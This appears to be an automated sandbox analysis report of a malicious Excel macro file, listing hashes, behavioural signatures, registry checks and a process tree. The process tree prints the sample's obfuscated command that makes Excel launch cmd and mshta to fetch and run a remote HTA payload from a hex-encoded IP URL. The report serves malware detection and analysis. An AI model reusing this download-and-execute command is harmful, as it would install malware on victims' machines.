Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19-01-2022 10:49
Behavioral task
behavioral1
Sample
ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea.xlsm
Resource
win10-en-20211208
General
-
Target
ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea.xlsm
-
Size
114KB
-
MD5
74e51ea25acbbad7750f905be8ae1ab9
-
SHA1
260164bae357ae9136d5693146425eb6f6b09e55
-
SHA256
ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea
-
SHA512
90d3b710ac2d533ec4997089091dc5100aa266f71fc3d2b836206600f1a255f5e9667a4e773a5e2e4b765517e6a395bd94dbf1e00631d4db9d2c560641272c34
Malware Config
Extracted
http://0x5cff39c3/sec/sec.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2096 3064 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 43 824 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3064 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
EXCEL.EXEpid process 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE 3064 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 3064 wrote to memory of 2096 3064 EXCEL.EXE cmd.exe PID 3064 wrote to memory of 2096 3064 EXCEL.EXE cmd.exe PID 2096 wrote to memory of 824 2096 cmd.exe mshta.exe PID 2096 wrote to memory of 824 2096 cmd.exe mshta.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/sec.html3⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3064-115-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmpFilesize
64KB
-
memory/3064-116-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmpFilesize
64KB
-
memory/3064-117-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmpFilesize
64KB
-
memory/3064-118-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmpFilesize
64KB
-
memory/3064-121-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmpFilesize
64KB
-
memory/3064-128-0x00007FFE76C00000-0x00007FFE76C10000-memory.dmpFilesize
64KB
-
memory/3064-129-0x00007FFE76C00000-0x00007FFE76C10000-memory.dmpFilesize
64KB